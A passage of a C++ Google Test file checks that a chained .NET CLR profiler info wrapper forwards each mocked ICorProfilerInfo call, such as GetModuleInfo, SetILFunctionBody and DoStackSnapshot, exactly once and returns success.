.WillByDefault(Invoke([this](/* [in] */ FunctionEnter *pFuncEnter,
/* [in] */ FunctionLeave *pFuncLeave,
/* [in] */ FunctionTailcall *pFuncTailcall) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetFunctionIDMapper_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetFunctionIDMapper(_))
.WillByDefault(Invoke([this](/* [in] */ FunctionIDMapper *pFunc) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetFunctionIDMapper(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetFunctionIDMapper(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetTokenAndMetaDataFromFunction_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetTokenAndMetaDataFromFunction(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ REFIID riid,
/* [out] */ IUnknown **ppImport,
/* [out] */ mdToken *pToken) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetTokenAndMetaDataFromFunction(_, _, _, _)).Times(1);
GUID guid;
ASSERT_EQ(S_OK, testProfilerInfo_->GetTokenAndMetaDataFromFunction(0, guid, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetModuleInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetModuleInfo(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ LPCBYTE *ppBaseLoadAddress,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ AssemblyID *pAssemblyId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetModuleInfo(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetModuleInfo(0, nullptr, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetModuleMetaData_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetModuleMetaData(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ DWORD dwOpenFlags,
/* [in] */ REFIID riid,
/* [out] */ IUnknown **ppOut) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetModuleMetaData(_, _, _, _)).Times(1);
GUID guid;
ASSERT_EQ(S_OK, testProfilerInfo_->GetModuleMetaData(0, 0, guid, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILFunctionBody_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILFunctionBody(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdMethodDef methodId,
/* [out] */ LPCBYTE *ppMethodHeader,
/* [out] */ ULONG *pcbMethodSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILFunctionBody(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILFunctionBody(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILFunctionBodyAllocator_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILFunctionBodyAllocator(_, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ IMethodMalloc **ppMalloc) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILFunctionBodyAllocator(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILFunctionBodyAllocator(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetILFunctionBody_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetILFunctionBody(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdMethodDef methodid,
/* [in] */ LPCBYTE pbNewILMethodHeader) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetILFunctionBody(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetILFunctionBody(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAppDomainInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAppDomainInfo(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ AppDomainID appDomainId,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ ProcessID *pProcessId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAppDomainInfo(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAppDomainInfo(0, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAssemblyInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAssemblyInfo(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ AssemblyID assemblyId,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ AppDomainID *pAppDomainId,
/* [out] */ ModuleID *pModuleId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAssemblyInfo(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAssemblyInfo(0, 0, nullptr, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetFunctionReJIT_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetFunctionReJIT(_))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetFunctionReJIT(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetFunctionReJIT(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_ForceGC_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, ForceGC())
.WillByDefault(Invoke([this](void) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, ForceGC()).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->ForceGC());
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetILInstrumentedCodeMap_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetILInstrumentedCodeMap(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ BOOL fStartJit,
/* [in] */ ULONG cILMapEntries,
/* [size_is][in] */ COR_IL_MAP rgILMapEntries[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetILInstrumentedCodeMap(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetILInstrumentedCodeMap(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetInprocInspectionInterface_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetInprocInspectionInterface(_))
.WillByDefault(Invoke([this](/* [out] */ IUnknown **ppicd) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetInprocInspectionInterface(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetInprocInspectionInterface(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetInprocInspectionIThisThread_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetInprocInspectionIThisThread(_))
.WillByDefault(Invoke([this](/* [out] */ IUnknown **ppicd) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetInprocInspectionIThisThread(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetInprocInspectionIThisThread(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadContext_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadContext(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ ContextID *pContextId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadContext(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadContext(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_BeginInprocDebugging_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, BeginInprocDebugging(_, _))
.WillByDefault(Invoke([this](/* [in] */ BOOL fThisThreadOnly,
/* [out] */ DWORD *pdwProfilerContext) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, BeginInprocDebugging(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->BeginInprocDebugging(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EndInprocDebugging_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EndInprocDebugging(_))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwProfilerContext) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EndInprocDebugging(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EndInprocDebugging(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILToNativeMapping_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILToNativeMapping(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ ULONG32 cMap,
/* [out] */ ULONG32 *pcMap,
/* [length_is][size_is][out] */ COR_DEBUG_IL_TO_NATIVE_MAP map[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILToNativeMapping(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILToNativeMapping(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_DoStackSnapshot_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, DoStackSnapshot(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID thread,
/* [in] */ StackSnapshotCallback *callback,
/* [in] */ ULONG32 infoFlags,
/* [in] */ void *clientData,
/* [size_is][in] */ BYTE context[],
/* [in] */ ULONG32 contextSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, DoStackSnapshot(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->DoStackSnapshot(0, nullptr, 0, nullptr, nullptr, 0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks2(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter2 *pFuncEnter,
/* [in] */ FunctionLeave2 *pFuncLeave,
/* [in] */ FunctionTailcall2 *pFuncTailcall) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks2(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks2(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionInfo2(_, _, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID funcId,
/* [in] */ COR_PRF_FRAME_INFO frameInfo,
/* [out] */ ClassID *pClassId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdToken *pToken,
/* [in] */ ULONG32 cTypeArgs,
/* [out] */ ULONG32 *pcTypeArgs,
/* [out] */ ClassID typeArgs[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionInfo2(_, _, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionInfo2(0, 0, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetStringLayout_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetStringLayout(_, _, _))
.WillByDefault(Invoke([this](/* [out] */ ULONG *pBufferLengthOffset,
/* [out] */ ULONG *pStringLengthOffset,
/* [out] */ ULONG *pBufferOffset) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetStringLayout(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetStringLayout(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassLayout_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassLayout(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classID,
/* [out][in] */ COR_FIELD_OFFSET rFieldOffset[],
/* [in] */ ULONG cFieldOffset,
/* [out] */ ULONG *pcFieldOffset,
/* [out] */ ULONG *pulClassSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassLayout(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassLayout(0, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassIDInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassIDInfo2(_, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdTypeDef *pTypeDefToken,
/* [out] */ ClassID *pParentClassId,
/* [in] */ ULONG32 cNumTypeArgs,
/* [out] */ ULONG32 *pcNumTypeArgs,
/* [out] */ ClassID typeArgs[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassIDInfo2(_, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassIDInfo2(0, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCodeInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCodeInfo2(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionID,
/* [in] */ ULONG32 cCodeInfos,
/* [out] */ ULONG32 *pcCodeInfos,
/* [length_is][size_is][out] */ COR_PRF_CODE_INFO codeInfos[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCodeInfo2(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCodeInfo2(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassFromTokenAndTypeArgs_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassFromTokenAndTypeArgs(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleID,
/* [in] */ mdTypeDef typeDef,
/* [in] */ ULONG32 cTypeArgs,
/* [size_is][in] */ ClassID typeArgs[],
/* [out] */ ClassID *pClassID) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassFromTokenAndTypeArgs(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassFromTokenAndTypeArgs(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromTokenAndTypeArgs_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromTokenAndTypeArgs(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleID,
/* [in] */ mdMethodDef funcDef,
/* [in] */ ClassID classId,
/* [in] */ ULONG32 cTypeArgs,
/* [size_is][in] */ ClassID typeArgs[],
/* [out] */ FunctionID *pFunctionID) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromTokenAndTypeArgs(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromTokenAndTypeArgs(0, 0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumModuleFrozenObjects_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumModuleFrozenObjects(_, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleID,
/* [out] */ ICorProfilerObjectEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumModuleFrozenObjects(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumModuleFrozenObjects(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetArrayObjectInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetArrayObjectInfo(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [in] */ ULONG32 cDimensions,
/* [size_is][out] */ ULONG32 pDimensionSizes[],
/* [size_is][out] */ int pDimensionLowerBounds[],
/* [out] */ BYTE **ppData) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetArrayObjectInfo(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetArrayObjectInfo(0, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetBoxClassLayout_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetBoxClassLayout(_, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ ULONG32 *pBufferOffset) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetBoxClassLayout(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetBoxClassLayout(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadAppDomain_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadAppDomain(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ AppDomainID *pAppDomainId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadAppDomain(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadAppDomain(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetRVAStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetRVAStaticAddress(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetRVAStaticAddress(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetRVAStaticAddress(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAppDomainStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAppDomainStaticAddress(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ AppDomainID appDomainId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAppDomainStaticAddress(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAppDomainStaticAddress(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadStaticAddress(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ ThreadID threadId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadStaticAddress(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadStaticAddress(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetContextStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetContextStaticAddress(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ ContextID contextId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetContextStaticAddress(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetContextStaticAddress(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetStaticFieldInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetStaticFieldInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [out] */ COR_PRF_STATIC_TYPE *pFieldInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetStaticFieldInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetStaticFieldInfo(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetGenerationBounds_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetGenerationBounds(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ULONG cObjectRanges,
/* [out] */ ULONG *pcObjectRanges,
/* [length_is][size_is][out] */ COR_PRF_GC_GENERATION_RANGE ranges[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetGenerationBounds(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetGenerationBounds(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetObjectGeneration_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetObjectGeneration(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ COR_PRF_GC_GENERATION_RANGE *range) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetObjectGeneration(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetObjectGeneration(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetNotifiedExceptionClauseInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetNotifiedExceptionClauseInfo(_))
.WillByDefault(Invoke([this](/* [out] */ COR_PRF_EX_CLAUSE_INFO *pinfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetNotifiedExceptionClauseInfo(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetNotifiedExceptionClauseInfo(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumJITedFunctions_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumJITedFunctions(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerFunctionEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumJITedFunctions(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumJITedFunctions(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_RequestProfilerDetach_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, RequestProfilerDetach(_))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwExpectedCompletionMilliseconds) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, RequestProfilerDetach(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->RequestProfilerDetach(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetFunctionIDMapper2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetFunctionIDMapper2(_, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionIDMapper2 *pFunc,
/* [in] */ void *clientData) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetFunctionIDMapper2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetFunctionIDMapper2(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetStringLayout2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetStringLayout2(_, _))
.WillByDefault(Invoke([this](/* [out] */ ULONG *pStringLengthOffset,
/* [out] */ ULONG *pBufferOffset) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetStringLayout2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetStringLayout2(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks3_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter3 *pFuncEnter3,
/* [in] */ FunctionLeave3 *pFuncLeave3,
/* [in] */ FunctionTailcall3 *pFuncTailcall3) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks3(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks3WithInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3WithInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter3WithInfo *pFuncEnter3WithInfo,
/* [in] */ FunctionLeave3WithInfo *pFuncLeave3WithInfo,
/* [in] */ FunctionTailcall3WithInfo *pFuncTailcall3WithInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3WithInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks3WithInfo(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionEnter3Info_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionEnter3Info(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ COR_PRF_ELT_INFO eltInfo,
/* [out] */ COR_PRF_FRAME_INFO *pFrameInfo,
/* [out][in] */ ULONG *pcbArgumentInfo,
/* [size_is][out] */ COR_PRF_FUNCTION_ARGUMENT_INFO *pArgumentInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionEnter3Info(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionEnter3Info(0, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionLeave3Info_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionLeave3Info(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ COR_PRF_ELT_INFO eltInfo,
/* [out] */ COR_PRF_FRAME_INFO *pFrameInfo,
/* [out] */ COR_PRF_FUNCTION_ARGUMENT_RANGE *pRetvalRange) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionLeave3Info(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionLeave3Info(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionTailcall3Info_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionTailcall3Info(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ COR_PRF_ELT_INFO eltInfo,
/* [out] */ COR_PRF_FRAME_INFO *pFrameInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionTailcall3Info(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionTailcall3Info(0, 0, nullptr));
}
